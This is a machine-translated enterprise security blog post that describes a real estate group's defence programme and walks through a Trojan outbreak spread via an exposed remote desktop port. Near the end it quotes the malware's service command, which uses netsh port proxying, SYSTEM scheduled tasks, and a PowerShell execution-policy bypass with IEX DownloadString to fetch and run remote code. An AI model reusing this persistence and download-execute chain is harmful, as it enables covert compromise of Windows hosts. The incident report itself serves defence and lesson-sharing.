information security practice summary and information security emergency case sharing of a large group enterprise

Posted by lipsius at 2020-03-10

Part I overview

A large real estate company has businesses in more than 70 cities in Hong Kong, Macao and the mainland, as well as overseas countries and regions.

Since 2017, the enterprise has taken accelerating the pace of informatization construction and digital transformation as an important strategic measure, gradually increasing the informatization budget, realizing data intelligent connection and innovation empowerment, supporting management change and leading business innovation.

Information security is an inevitable or neglected problem in the process of enterprise digital transformation, which determines the success or failure of enterprise digital. In this process, data becomes a very important asset of enterprises. Information security has an immeasurable impact on the development of enterprises. The construction of enterprise security system is a dynamic and long-term process, which is difficult to achieve overnight. How to deal with security risks comprehensively, actively and effectively from the strategic, governance and implementation levels, while transforming risks into opportunities, and promoting the sustainable development of digital transformation, is a long way to go. In order to achieve this goal, the company quickly established an information security team, and spared no effort to promote the construction of information security in the process of digital transformation.

After nearly three years of construction, the enterprise has found a suitable road for its own information security construction. Taking the implementation of the network security law as an opportunity, it complies with the requirements of the level protection standard, strengthens all-round active defense and overall prevention and control, realizes the security coverage of peer-to-peer protection objects, from post remediation to security front, from partial division to comprehensive protection, from passive security to active security The transformation of dynamic security, the construction of an active and comprehensive security protection system, and the protection of the digital transformation, is the information security response of a large real estate company after the digital transformation.

In terms of specific construction steps, From the perspective of focusing on the demands of core data protection, the information security construction is divided into three stages: building a wall, building a fortress and fine management and control. First, according to the requirements of level protection, the core system level protection evaluation work is carried out. In 2018, the evaluation rectification is completed smoothly, and the evaluation certificate is obtained. In 2019, the cloud platform level 3 protection is launched Assessment work: in terms of infrastructure security construction, online network traffic backtracking analysis system, web application firewall, operation and maintenance audit bastion machine, etc., quickly formed a moat in the headquarters, and the company's overall security defense ability has been greatly improved.

Aiming at the weakness of employees' information security awareness, we have carried out long-term information security publicity and implementation, pushed security knowledge and company security system through OA intranet, mobile portal app and other ways, and carried out "network security week" publicity activities for three consecutive years. Through online and offline cross platform, all-round publicity, we have made the information security concept deeply rooted in the hearts of the people and in the company The cultural atmosphere of "information security and everyone's responsibility" has been formed initially, which has comprehensively improved the employees' awareness of information security.

With the rapid development of information technology, the black production is also evolving, and the high-level malicious code is evolving in the form of rapid variety, diversification and dynamic interaction. Although the enterprise has built a relatively complete defense system in depth, it still faces many risks and threats, including the following:

1. The security attack and defense capabilities are extremely unequal, such as malicious code. Compared with traditional viruses, it has more varieties, faster updates, and more difficult to find traditional detection methods. At the same time, hacker attacks have more characteristics of "sea, land and air" (different attack loads, attack methods, attack dimensions), all-weather, and all-round attack. Relying on a single security product or border protection, it is often unable to be full Meet the safety requirements of the enterprise;

2. The protection of regional companies is weak. The regional companies connect with the headquarters through the MPLS-VPN special line. At the same time, the regional companies also have their own Internet exports to access the Internet, which brings many risks. Due to the limitation of security budget and human resources, the regional companies do not have a full-time security team, so it is difficult to carry out efficient risk prevention;

3. Internal network flattening problem: at present, the enterprise's internal network is connected with more than 60 regional companies, and at the same time, it is also connected with internal brother companies of the group company through MPLS VPN. The level of security construction of each company is uneven. More attention is paid to border defense on the network side, while internal cross regional protection is often selectively ignored. In the actual attack and defense scenario, the "high" and "thick" walls will eventually be bypassed. Once an attacker breaks through the boundary of a company in a certain region to obtain preliminary authority, the vacuum of internal security capability will easily lead to collective occupation. After entering the internal network, the attacker penetrates horizontally, which is usually smooth without any disadvantage;

4. The single point security capability always has the problem of false alarm and false alarm. Even if the current attack is blocked, the attacker may bypass the protection after a period of research. The compatibility of security equipment and business system is a long-term running in process, which will inevitably lead to invalid alarm, and the real effective alarm is often submerged.

The second part, the enterprise information security construction ideas

In order to effectively deal with the current problems and meet the urgent security needs, we need to use the machine learning technology based on big data to mine the patterns of known threats, and then through expert analysis, extract malicious behaviors and output security capabilities, with multiple security capabilities such as threat intelligence detection, network anomaly detection, intrusion detection, host behavior detection, etc., from the "end, boundary In the space dimension of "cloud" and in the time dimension of "early warning, monitoring, analysis and clearing", the closed-loop management of security protection is realized, truly achieving "comprehensive defense, active early warning, safe operation, all-weather and all-round awareness of network security situation".

In order to achieve this goal, we have formulated the aegis plan for enterprise information security, and carried out security construction from the following aspects, including:

Attack and defense side: converges the attack surface and has the ability to effectively protect all kinds of known attacks;

Network side: it has the analysis, detection and analysis backtracking ability to cover all network protocol stacks, and can cover all borders and links of MPLS VPN interconnection;

Host side: take the business host (server) as the key point of security defense, build the last kilometer defense line, and quickly build an adaptive defense system;

Terminal side: establish the terminal security defense system, and locate the controlled host in the network by detecting the DGA domain name in the network traffic.

Security domain division: Based on the principle of zero trust network, the hierarchical division is carried out, especially the effective isolation of the intranet interconnected network, to prevent the fortress from being broken through from the inside, and to create a Maginot line that can not be bypassed.

Part three: specific achievements of information security construction of the enterprise

In terms of our achievements in security construction in the past three years, the basic action plan includes the following:

(1) Step by step

In the face of the above risks, at the data center level of the headquarters, through the special work of cleaning up sensitive information, cleaning up network assets, converging network attacks, security risk investigation and rectification, key target defense, etc., and in cooperation with the regular vulnerability scanning work, gradually rectify security vulnerabilities, and eliminate the offline unsafe business system; and the strategy of security equipment The bank effectively tightened, forming a security situation of loophole convergence, effective protection and strong guarantee.

At present, the company's headquarters has 150 + Internet IP, 150Mbps Internet bandwidth and 60 + business systems. It has defended more than 2.52 million DDoS attacks, intercepted 21.6 million network layer attacks and intercepted more than 720000 application layer attacks in a year;

(2) Luring the enemy deep into the layers of fortification

In order to solve the problems of internal network attacks and unknown threats, the headquarters of the company launched the open-source honeypot system T-Pot, and malicious code and behavior detection as the first defense line against hackers and cyber criminals. It mainly uses the distinguishing technology of characteristic database and behavior, which inevitably brings the problem of false alarm and omission. Honeypot system can effectively avoid this problem, by building a camouflaged business to actively lure the attacker, detect and analyze the intrusion behavior in the preset environment, restore the attacker's attack path, method, process, etc., and use the obtained information to protect the real system;

Through honeypot system, using deception defense technology, through precise design, the only way for malicious hackers is to arrange decoy nodes and confuse their attack targets, so as to isolate and protect the real assets of enterprises and delay the attack time of hackers.

Honeypot system can find the potential threat accurately and accurately. After capturing the threat, it will give an alarm at the first time, which is faster than the traditional security protection means. Using honeypot to obtain the attacker's information, such as the attacker's IP, it can block the source of the attack through the firewall and WAF device.

Since the honeypot system was deployed, the enterprise has captured 400000 attacks and 2800 IP attacks throughout the year, which are complementary to firewalls and WAFS.

Figure: brute force user name and password captured by honeypot

(3) Intranet isolation defense in depth

In view of the problem of internal network flattening, we have preliminarily isolated the internal network through the way of security domain division. For the interconnection requests from regional companies and brother companies, we no longer adopt the default release rules, but carry out hierarchical division based on the principle of zero trust network to prevent vertical infection and horizontal spread of virus Trojan horses.

Through the subsidiary network specification, Implement the border security protection system of subsidiaries, deploy firewalls at the Internet outlets of regional and branch companies, deploy anti-virus software at the terminal level, and complete the deployment of 4000 + terminal anti-virus software of the whole company; at the same time, regularly promote special patrol inspection, carry out terminal security scanning for regional companies, and supervise and rectify the terminals with high-risk vulnerabilities found; in daily work, Timely report and rectify the terminals infected with zombies, Trojans and worms found by regional companies.

According to the characteristics of all kinds of security devices deployed in the boundary, terminal, cloud network and special line network, targeted design corresponding detection means, improve strengths and make up weaknesses, give full play to the role of data linkage analysis, establish a relatively complete defense system in depth, form a horizontal to side, vertical to bottom three-dimensional defense framework and effectively land, achieve better results.

(4) Everything is clear and precise

No matter how advanced an attack is, it will leave traces of the network. Therefore, full flow analysis is a very good way to accurately perceive security. Full flow threat analysis backtracking system can quickly detect all kinds of key events, such as apt attack events, botnet events, malicious sample propagation, webshell, hidden tunnel and other high-risk security events. Taking traffic behavior as an example, the connection behavior of the normal network layer is loose and randomly distributed, as shown in the following figure:

In case of abnormal connection, for example, after the terminal infects the Trojan and becomes a zombie host, it will scan the same network segment and the external network, and its connection behavior will be as follows:

Through the above rules, the traffic analysis backtracking system can be a good early warning, timely positioning of the network has been controlled within the host.

At the same time, the traffic analysis and backtracking system can well conduct C & C server access monitoring (Command & control server, which is the main control server of command and control botnet). Each instance of Trojan horse obtains instructions to attack by communicating with its C & C server, including obtaining the time and target of attack, uploading the information stolen from the host computer, encrypting and extorting the infected machine file at regular intervals.

By introducing external threat intelligence and combining with its own traffic analysis and backtracking system, the problem of Botnet in branches is solved. At present, we have mature applications based on domain name, IP address, sample characteristics, etc. to detect the loss of remote control or malicious download of various IP, domain name and URL for one key interception and early warning, and at the same time, we can draw the whole process of communication between the lost host and the external network, propagation and diffusion and penetration in the internal network, and ultimately achieve the target of attack.

(5) Intelligence driven security linkage

In the process of building the network security system, it is a point-to-face process. In the online process, different manufacturers and different brands of security equipment will inevitably be in a decentralized state, rather than having a natural linkage mechanism; and the single point security capability will always have the problem of false positives and false positives; we also found this problem in the three-year security construction and security operation process It is often necessary to invest a lot of manpower to optimize the strategies of various devices. For example, after an attacker breaks through the first line of defense of firewall and WAF devices, although it is found by the traffic analysis system and honeypot, it is often necessary for the security administrator to handle the alarm manually to intercept the IP address. The timeliness cannot be guaranteed. The security comes from the linkage, and each is a battalion. How can they work together?

In order to solve this problem, the core of our aegis plan is to establish the linkage mechanism of all security devices through threat intelligence, so as to achieve security coordination and network wide linkage.

In the process of construction, we introduce the Internet big intelligence system to integrate, share and use intelligence information intensively; at the same time, we combine firewall, WAF, traffic analysis system, situation awareness, honeypot and other centralized alarm log processing, and build a small intelligence system (private cloud) with the help of the technology middle platform. This private intelligence system, we also call it security medium The prototype platform can not only call the firewall and WAF interface in real time for linkage processing, but also can be provided to the group's brother companies for use, greatly reducing the processing time of security events, and can solve security problems in the most efficient way.

Through this kind of security equipment linkage management, it can ensure that the security equipment in the system work together, improve the detection accuracy and processing efficiency of security events, so as to deal with the increasingly complex and changeable network security threats.

(6) Emergency response network coordination

We have further improved and improved the integrated mechanism of network security incident monitoring and discovery, notification and early warning, and emergency response. In the process of security operation, monitoring is only the first step, followed by a series of processes, such as disposal, traceability, repair, optimization, etc. we have prioritized the events that need to be handled to form an hour level, day level, week level, month level processing mechanism, so that important events can be Solve it in time.

For real-time lost events and deteriorating security events, we will give early warning throughout the network, improve the emergency response level, and timely kill information security events in the bud.

For vulnerability scanning, baseline verification, security update and other work, we have formed a periodic task execution, and carried out regular tracking and processing on a quarterly basis.

At the same time, we carry out various special actions, such as password security special inspection plan, network wide terminal security scanning action, penetration test, security drill, etc., to timely grasp and solve the problems that affect the network security operation or exist, and improve the level of security protection.

Next, through a typical information security case to introduce the enterprise's information security construction results and relevant experience summary. This practical case not only tests the past security construction results, but also provides valuable experience for the subsequent security system construction.

Part IV real information security emergency case sharing

In the early morning of December 2, the Branch Shanghai company exposed the remote desktop port of a file sharing server to the public network in violation of regulations, which led to a large number of local terminals infected with variant Trojans, and a large number of spread attacks within the network (accumulatively infected more than 50, accounting for nearly 50%). The headquarters conducted the first time through the traffic analysis system, Threat Intelligence Service and honeypot service In the case that firewall and anti-virus software are not able to completely defend this variant of Trojan horse, after two days of emergency response, the terminal has basically been killed and strengthened, which has not caused a great impact on the group's internal network.

In this case, through the traffic analysis system and threat intelligence service, the headquarters found the DNS domain name abnormal access behavior of Shanghai company's terminals and gave early warning (the Trojan horse obtained the remote control command through the address communication of C & C server), deployed honeypot service found the horizontal penetration attack of Shanghai company's poisoning terminal on the headquarters data center, and captured its attack tactics( The Trojan comprehensively utilizes the functions of ms17-010 Eternal Blue vulnerability attack, SMB blast attack, SQL blast attack, etc., and installs multiple PowerShell backdoors on the target machine where the attack succeeds, Download and execute the new attack module); as the security domain division of the headquarters firewall is effective and the strategy is effectively tightened, there is no flat attack situation after some terminals are poisoned in the intranet, and most companies in other regions have also strengthened in the early special actions, which did not cause large-scale horizontal penetration.

Through this practical test, the effectiveness of the enterprise's defense in depth system and monitoring emergency early warning system is verified. Through the summary and reflection of the incident, we can learn from the experience and lessons of information security, which is conducive to the common improvement of security level.

Part V: safety incident handling and new source process

1. Event timeline

Through the threat intelligence, honeypot and flow analysis system, the headquarters carried out the monitoring and emergency early warning, and also provided valuable experience for the follow-up security system construction.



The hacker enters the file server through the remote desktop exposed to the public network, and installs the Trojan horse service (find the installation record in the server system log afterwards)

The headquarters threat intelligence system receives the first DNS warning: attempts to access the domain name of driver: matches the previous log, and can be identified as the first source of attack

2019-12-02 5:01

Trojans continue to penetrate horizontally, and the headquarters threat intelligence system receives the second terminal alarm: request domain name

2019-12-02 5:02

Headquarters threat intelligence system receives the third terminal alarm: request domain name

2019-12-02 5:19

Headquarters threat intelligence system receives the fourth terminal alarm: request domain name

2019-12-02 5:27

Headquarters threat intelligence system receives the fifth terminal alarm: request domain name

2019-12-02 5:28

Headquarters threat intelligence system receives the sixth terminal alarm: request domain name

... The above attack firewalls and anti-virus software are not effectively defended

Headquarters honeypot system received a vulnerability attack from using port 445 of eternal blue, indicating that the Trojan has started the whole network scanning

The honeypot system of headquarters received the vulnerability attack from by using the port 3389 of remote desktop and SQL server, indicating that Trojan horse has begun to attack the server and database of headquarters data center

... After going to work, the terminals of Shanghai company start up gradually, and the infection area increases

The headquarters personnel found the alarm after going to work, initially judged it as an information security incident, and reported it to the information administrator function line for early warning

After various judgments, the early warning level will be raised, and the IP and related information of 18 computers poisoned will be sent to the person in charge of the human resources and Administration Department of Shanghai company by email, and a copy will be sent to the general manager, requesting that the terminal be found as soon as possible

The administrator of Shanghai company found multiple terminals, which could not be killed by antivirus software scanning

Contact the anti-virus manufacturer urgently, and the manufacturer shall coordinate the personnel of Shanghai office to the site for disposal, and promise to be in place within one hour

After the personnel of the manufacturer are in place, cooperate with the information administrator to carry out terminal killing and contact the R & D background for positioning

The manufacturer's personnel shall issue the disposal manual, and conduct one by one investigation and killing through special killing tools according to the disposal manual

... Because a large number of terminals in the network are poisoned, they are infected repeatedly after antivirus

After the video conference, at 9:00 p.m., the Shanghai company will be disconnected from the network, and the special killing tools will be processed one by one. After 11:00 p.m., about 30 terminals will be processed. Because the financial floors and other floors are closed, they will be processed the next day

Anti virus manufacturers feedback that they need to upgrade the anti-virus software version from to, which can force the periodic task of killing viruses

The headquarters shall monitor the terminal found and hand it to the local administrator to unplug the network cable and disconnect the network, and cooperate with the manufacturer's engineer to investigate and kill it

The antivirus software version of Shanghai company has been upgraded from to

The check and kill effect of the upgraded version is not ideal. You need to manually check and kill again with the special killing tool

Basically, the virus was suppressed, and 26 or so were killed again. No similar alarm was found in the network. The port mapping of the file server was canceled on the firewall

2. Screenshot of relevant disposal process

Through the log analysis of file server, it is found that the Trojan horse service was installed at 4:46 on December 2

2019-12-02 4:57 the headquarters threat intelligence system received the first DNS warning: try to access the driver domain name: matches the previous log

2019-12-02 6:48 headquarters honeypot system received a vulnerability attack from using the port 445 of eternal blue, indicating that the Trojan horse has started the whole network scanning, and began to try to attack the server and database of headquarters data center.

Trojan horse service example: bcqwctrqornyuisbfdku (name will be randomly generated)

Service file name:% COMSPEC% / C "netsh.exe firewall add portopening TCP 65529 SDNS & Netsh interface portproxy add v4tov4 listener = 65529 connectaddress = connectport = 53 & schtasks / create / Ru system / SC minute / Mo 10 / TN RTSA / TR" PowerShell - NOP - EP bypass - C 'IEX (new object System.Net.WebClient).DownloadString(\”\”)'” /F & echo %%path%%|findstr /i powershell>nul || (setx path “%path%; c:windowssystem32WindowsPowershellv1.0” /m) &schtasks /run /tn Rtsa & ver|findstr “5.[0-9].[0-9][0-9]*” && (schtasks /create /ru system /sc MINUTE /mo 60 /tn Rtas /tr “mshta“)”

Trojans repeatedly execute download instructions every hour to prevent deletion

The infected terminal seen on the headquarters firewall scans the 3389 port of the headquarters

Part VI summary of experience and lessons

As the security of the terminal greatly affects the security of the whole data center, many network security events and worms are caused by terminal infection. At the same time, the number of worms in IOT equipment is also increasing, so it is necessary to strengthen the security rectification to ensure the terminal security.

In this event, we summarized our experience as follows:

1. Good practical experience

The defense system of network security in depth has been preliminarily constructed, forming a three-dimensional defense framework from horizontal to side and from vertical to bottom.

2. Shortcomings

This time, it also reflects that the security situation is relatively severe, and it needs to take a look back in the future to check the terminal security situation in a normalized way, including the following:

Network attack and defense, incident handling, etc. are the basic security work of security work, but they are also a part of great pressure. Once the security risk cannot be controlled, it may lead to "lose everything". The construction of safe operation is not only inseparable from the investment and mechanism construction of human, financial and material resources, but also requires the improvement of the technical ability of the safe operation team. I would like to use this case for reference, so as to help realize the enterprise security strategy and better ensure the safe and stable operation of the enterprise business.